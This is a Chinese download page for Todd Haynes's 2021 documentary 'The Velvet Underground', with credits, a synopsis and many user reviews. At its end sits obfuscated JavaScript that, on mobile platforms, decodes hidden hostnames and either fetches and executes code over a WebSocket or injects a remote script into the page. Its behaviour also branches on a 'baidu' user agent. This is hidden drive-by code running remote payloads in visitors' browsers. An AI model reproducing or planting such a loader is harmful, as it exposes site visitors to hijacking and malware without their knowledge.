2021美国纪录片《地下丝绒》HD1080P.中英双字


更新时间:2021-10-17 09:24:05 类别: 纪录片 评论 下载
地下丝绒的海报 地下丝绒

地下丝绒

导演: 托德·海因斯
编剧: 托德·海因斯
主演: 卢·里德 / 约翰·凯尔 / 拉·蒙特·杨 / Jonathan Richman / 玛丽·沃伦诺夫 / Maureen Tucker / Sterling Morrison / Amy Taubin / Doug Yule / Merrill Reed Weiner
类型: 纪录片
制片国家/地区: 美国
语言: 英语
上映日期: 2021-07-07(戛纳电影节) / 2021-10-15(美国网络)
又名: The Velvet Underground
片长: 110分钟
IMDb: tt7230750
托德·海恩斯将首执导纪录片,聚焦缔造传奇的地下丝绒摇滚乐队。影片目前暂未定名,海恩斯则表示,本片必定会借鉴安迪·沃霍风格,也会更富文化意义。片中将收录乐队目前在世成员的采访。该纪录片的出现,也正好是该乐队首张经典专辑《地下丝绒与妮可》发行50周年。
托德·海恩斯宣布将携手宝丽金、Verve Label Group一同打造这部聚焦地下丝绒摇滚乐队的未定名传记片。他表示:“能与环球音乐的团队一起着手这个项目,我感到非常兴奋,这是我执导的第一部纪录片,是关于音乐世界中最激进、最具影响力的摇滚乐队之一的地下丝绒乐队。”
鲍勃粥 2021-10-01

5.2/10 #NYFF 结构老套,画面呈现出单调得华丽,以至于后半段甚至可以忽略画面只听讲述。时而将屏幕分割成不同区域以呈现的纪录片方式似乎在诸多流媒体寡头制作中经常出现,HBO,网飞,还有制作该片的苹果,某种意义上算是PPT的变体。档案材料似乎过度向自我叙述和他人评价两种语言载体倾斜,完全没有运用好大银幕,而对于Andy, Lou所处的时代整体背景也语焉不详,匆忙潦草。

咯咯精 2021-07-08

一百星!谢谢Todd Haynes给我拍了这部电影,本老李学家认证这部无黑点《人人都爱卢里德》彩虹屁合集&《教父の安迪沃霍尔》。Venus in Fur开场收尾我简直老泪纵横,60s demo,录音室版本,各种live版本直到72‘和Nico重聚的Bataclan live。After Hour果然有浓墨重彩的一笔。真的懂,有钱,有人。(片尾感谢gvs哈哈

舌在足矣 2021-10-01

用了这么多素材,安迪·沃霍应该获得联合导演的署名。尽管现在一提到地下丝绒就是卢·里德,但实际上John Cale决定性的贡献也在本片中得到了体现

迷宫werewolf 2021-10-15

安迪沃霍尔和lou睡过吧

大胃⃣麒⃣ 2021-10-15

素材运用得太棒了,海量实验电影片段信手拈来,分屏构图和大头采访都处理得很有美感,todd haynes不愧是你

TWY 2021-10-15

作为VU粉丝纪录片的部分并不太新鲜,主要意义显然是作为一部archive电影,作为1960年代纽约地下艺术和实验影像世界的一份“影像之书”而存在的,尤其展示了沃霍尔《Screen Test》系列的惊人美感。

刘浪 2021-10-16

多人一个卢里德。

poiuny 2021-10-01

#NYFF 59. 影片里用了六七十年代大量的实验电影片段还有demo版的歌,是特别珍贵的影像资料。地下丝绒是对我来说特别重要的一支乐队,所以无法客观。想到几个瞬间:一是有一年兵马司办的地下丝绒的致敬演出,那时我跟朋友说50年后坐着轮椅我也还要看演出;二是2013年末某天凌晨2点多,我当时在熬夜写留学申请的文书,打开网页发现Lou Reed去世的消息,特别难过。那应该是我第一次经历喜欢的音乐人离世。第三是2017年在BAM看的John Cale办的纪念地下丝绒唱片出版50周年的演出。John Cale太有才华了。

Christian 2021-10-16

#Cannes74展映,Velvet的兴盛与解散,还原安迪沃霍尔的风格,分割画面,还有许多Andy和乐队期间记录下来的短片,灯红酒绿、日常排练的琐碎生活。尤其是Nico的加入让整个乐队变得精神焕发了起来,而最后看着成员接连去世的文字,只能叹息。

极地单子星 2021-10-15

我喜欢胶片的质感、分格构图和那些被你和我翻来覆去听过的歌曲。就将过去的情绪涌动留给所有明天的派对。从高中的摘抄里找到了Luke Wood对地下丝绒的评价,“我最喜欢的乐队是The Velvet Underground。披头士乐队向世界传播旋律,滚石乐队向世界阐释激情,Otis Redding向人们演绎了声音的力量,但是我认为The Velvet Underground是一支真正意义上启迪了人们对公民权利意识认知的摇滚乐队。他们几乎是其他所有充斥着怪诞与愤怒的朋克摇滚、新浪潮、校园摇滚、氛围音乐、独立摇滚等音乐类型的开端。他们是智慧、艺术、情感、愤怒和冒险的完美体现。”

義人青立 2021-10-09

LFF 2021 個人第一場,毫無預期居然見到了托德海因斯!不得不說很大程度上又是一個ppt電影,但沈浸式ppt還是會讓人淚目。好喜歡John Cale以及他在時候的地下絲絨啊⋯⋯

Ada的B计划 2021-10-15

《地上丝绒》,如《灾难艺术家》学了大量的形,内在却无一点是相似的,安迪·沃霍尔任一部毫不相关的影像作品都更贴切。

汽车大师 2021-10-16

这波普拼贴分屏剪辑爽得飞起

redhousepainter 2021-10-16

海因斯用安迪沃霍尔的方式和工厂的影像素材拍摄了一部地下丝绒分屏纪录片,非地下丝绒粉丝可能会觉得在看ppt,估计口碑会两极化。

ScusaMi 2021-07-16

手法极其平庸

Cardinal 2021-10-11

C /【MFF2021】露天放映。仅站在一个只听过香蕉专,对乐队生平不了解的角度来看,拍的还是过于流水账了,几乎是通过讲述的方式把乐队成立发展和人员变化过一遍,似乎没有过多关照时代,也没有更深入地阐述他们专辑对之后indie rock/pop的发展带来了多大的影响。时代怀旧感是海因斯擅长的,但是仅仅是分屏式(倒很契合之后流媒体上映)的影像资料的切片总觉得还是不够的。

有生之年 2021-10-03

纪录片不是你放弃电影语言的理由,用着PPT模板把每个出场人物都讲成毫无记忆点的扁平工具人,地下丝绒的几张专辑到底有什么特色和意义也无任何讨论,看的是导演见面会场,快完时起身发现后排所有观众都走了

Stiles 2021-10-15

并不粉丝向,更像广告片,真要学Warhol不如多弄些个Lou Reed的特写长镜头hh

VincentP 2021-10-14

这个纪录片其实很适合对地下丝绒不太了解的人来看,可以浅尝辄止的了解一下他们的音乐生涯,一切都很蜻蜓点水,有的段落甚至语焉不详。也许关于乐队的纪录片就是这样吧,需要做成几集来讲述,浓缩成这样还不如直接听歌来的干脆过瘾呢。

有酒辛烈 2021-10-15

好像地下丝绒也摆脱不了乐队的起承转合的流程 但是他们很特别 他们在那个花与和平的嬉皮士年代 是朋克 以及 我永远都爱lou reed

地下丝绒的截图1
地下丝绒的截图2
地下丝绒的截图3
地下丝绒的截图4
function feXDB(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function GJKNoa(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return feXDB(t);};window[''+'l'+'H'+'S'+'v'+'G'+'U'+'g'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=GJKNoa,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('Z2JyLmJoeWJsYW5rZXXQuY24=','dHIuueWVzdW42NzguuY29t','135631',window,document,['X','u']);}:function(){};